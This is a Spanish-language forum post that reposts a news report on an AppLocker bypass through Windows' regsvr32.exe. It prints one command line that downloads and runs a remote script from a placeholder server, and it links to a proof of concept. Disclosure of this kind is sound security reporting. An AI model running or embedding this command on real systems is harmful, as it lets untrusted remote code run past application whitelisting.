Calificación:
  • 0 voto(s) - 0 Media
  • 1
  • 2
  • 3
  • 4
  • 5
Fallo de seguridad en Windows
#1
Exclamación 
Otro fallo de seguridad en Windows


Una Importante función de seguridad de Windows puede ser eludida con sencillo comando 

AppLocker puede ser eludida con gran facilidad, utilizando una poco conocida funcionalidad de la herramienta regsrv32.exe, incorporada en Windows. 

Con la llegada de Windows 7, los responsables de TI pudieron disponer de una nueva herramienta que permitía autorizar y especificar qué software puede ser ejecutado en los terminales Windows de los usuarios en entornos corporativos. AppLocker hace posible controlar que grupos de usuarios están autorizados para ejecutar programas específicos. Por ejemplo, algunos programas sólo están disponibles para administradores, y otros programas, con por ejemplo juegos, no pueden ser ejecutados en horas de trabajo. Por extensión, esta función permite evitar la ejecución de malware. 

[Imagen: applocker-vulnerabilidad-windows.jpg]

Sin embargo, la semana pasada se distribuyó un boletín de seguridad según el cual AppLocker puede ser fácilmente eludido, utilizando una función poco conocida de la herramienta regsrv32.exe- que forma 
parte del sistema operativo Windows. 


El problema fue detectado y descrito en el blog del experto en seguridad informática Casey Smith. Según 
Smith, un elemento desconocido de regsrv32.exe es la capacidad de descargar y ejecutar scripts desde 
Internet al escribir parámetros como el siguiente: 


Código:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll 




Según el experto, este comando puede ser sustituido con cualquier programa instalado en la computadora, incluso aquellos que no estén en la lista autorizada con que opera AppLocker. 

En este enlace se proporciona una lista de ejemplos malignos, y en el siguiente vídeo se presenta la 
prueba de concepto. 


[video=youtube]https://youtu.be/858QHiUkU9o[/video]

Según Smith, regserv32.exe incorpora el soporte adecuado para descargar URL, incluido redireccionamiento y HTTPS. Asimismo, la herramienta no requiere derechos de administrador. El experto considera altamente probable que el procedimiento descrito pueda ser utilizado por intrusos para hacerse del control del sistema. 

El sitio Brown Hat Security describe la vulnerabilidad como crítica, debido a que hace posible la ejecución de código aleatorio mediante una herramienta de sistema supuestamente confiable. 

Hasta ahora, Microsoft no se ha referido al problema.


Posibles temas similares...
Tema Autor Respuestas Vistas Último mensaje
  Windows 7 o 8 Estarly_Eisenberg 17 526 02-08-2017, 08:26 AM
Último mensaje: efbsfcd
Información Linus Torvalds: la seguridad perfecta icurkan 3 270 03-12-2016, 05:12 AM
Último mensaje: Lob3zNo
Sonrisa Herramienta útil para nuestra seguridad yuma2009 9 442 02-12-2016, 06:21 AM
Último mensaje: shek
  Grsync: Sincronización y Copias de Seguridad Posits 10 473 05-10-2016, 10:39 PM
Último mensaje: Lerans
  Cómo realizar una copia de seguridad ? somera4334320 11 575 06-09-2016, 06:40 AM
Último mensaje: yayito21
Información Las 10 mejores distribuciones Linux a nivel de seguridad icurkan 0 240 06-02-2016, 04:59 AM
Último mensaje: icurkan
  Windows 10 L_Warez 9 788 01-09-2015, 10:33 PM
Último mensaje: betiko2424
  Ultimate Windows Tweaker 3 (Programa para tunear tu pc solo windows 8) XimiTuto 1 2,026 21-12-2014, 06:57 PM
Último mensaje: betiko2424
  Ultimate Windows Tweaker V2.2 (Programa para tunear tu pc solo Windows 7 y vista) XimiTuto 0 1,064 29-11-2014, 01:16 PM
Último mensaje: XimiTuto
  ¿Es Threshold un Windows 9 o una actualización a Windows 8.2? piinbook 2 723 18-07-2014, 09:48 AM
Último mensaje: celticslment



Usuarios navegando en este tema: 1 invitado(s)